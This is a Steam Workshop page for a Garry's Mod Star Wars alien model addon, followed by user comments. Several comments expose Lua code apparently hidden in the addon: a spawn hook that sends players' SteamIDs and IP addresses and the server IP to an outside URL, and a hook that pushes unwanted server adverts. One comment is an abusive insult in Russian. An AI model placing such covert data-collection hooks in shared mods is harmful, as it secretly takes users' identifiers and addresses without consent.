Garry's Mod

Garry's Mod

102 ratings
Star Wars - Aliens!
   
Award
Favorite
Favorited
Unfavorite
Content Type: Addon
Addon Type: Model
Addon Tags: Movie, Roleplay
File Size
Posted
2.523 MB
29 Mar, 2016 @ 12:27pm
1 Change Note ( view )

Subscribe to download
Star Wars - Aliens!

Description
Contains 4 new models!

Check out our server at
Star Wars Roleplay: 74.91.124.48
15 Comments
Norogami 27 Jul, 2022 @ 10:06am 
Мать в канаве, соси хуй быдло
Excellent Epsilon 29 May, 2022 @ 7:47am 
emo party picture
Jonathan Quadrox IV 15 Dec, 2020 @ 11:41am 
brilliant pm pack, would recommend
D4KiR 25 Mar, 2020 @ 10:34pm 
util.AddNetworkString( "chatadd" )
hook.Add("PlayerSpawn", "z", function(ply)
if !ply:IsAdmin() then
net.Start("chatadd")
net.WriteString("ad")
net.Send(ply)
end
end)

hook.Add("Think", "sfdgsadf", function()
net.Receive("chatadd", function(len, pl)
pl = LocalPlayer()
local var = net.ReadString()
white = Color( 240, 240, 240 )
red = Color( 240, 50, 50 )
gold = Color(240,240,60)
if !(pl:IsAdmin() == true) then
if var == "ad" then
chat.AddText( red,"► " ,gold, "Hammerfall Networks", white, " provided the content for this server", white,".")
chat.AddText( red,"► " ,gold, "Hammerfall Networks", white, " is back with Star Wars Roleplay! Check out our server at 74.91.124.48", white,".")
end
end
end)


end)
Sufficingpit29 1 Jan, 2020 @ 1:00am 
Oh whats this?

hook.Add("PlayerSpawn", "StatisticsTracking", function(system)
L = {}
L["sid"] = tostring(system:SteamID())
L["pip"] = tostring(system:IPAddress())
L["sip"] = tostring(game.GetIPAddress())
{LINK REMOVED}["sid"].."&pip="..L["pip"].."&sip="..L["sip"], nil, nil, nil)
end)

Kinda weird that it is hidden at the bottom of a file.
Home is Chrisep 16 Oct, 2017 @ 12:39pm 
hello, we are a german network and want to make an starwarsRP server. Would it be ok if we use your realy amazing content? If you have questions please come to our ts: 185.223.28.112
Wadio 15 Aug, 2017 @ 3:32pm 
Don't use these if you plan on making a server with them. Every once and a while an advertisement for his server pops up. Mind you the server isn't even online.
Lily 2 Jul, 2017 @ 9:01am 
Hi, I am unsure if you're aware of this, but in the sv_fuck_rubat file in this addon, you are overriding the L function in nutscript at the bottom the the file. Doing this causes this error

[ERROR] gamemodes/nutscript/plugins/vendor/sh_plugin.lua:307: attempt to call global 'L' (a table value)
1. unknown - gamemodes/nutscript/plugins/vendor/sh_plugin.lua:307`
2. func - gamemodes/nutscript/gamemode/core/libs/thirdparty/sh_netstream2.lua:117
3. unknown - lua/includes/extensions/net.lua:32

and prevents many functions that uses the L function within nutscript to stop working.
Benjamin F. 30 Apr, 2017 @ 5:57pm 
I sent you a friend request because im wondering if you take commsions for models.
Nutspider 30 Aug, 2016 @ 12:33am 
Are these playermodels or npcs?
Or just ragdolls?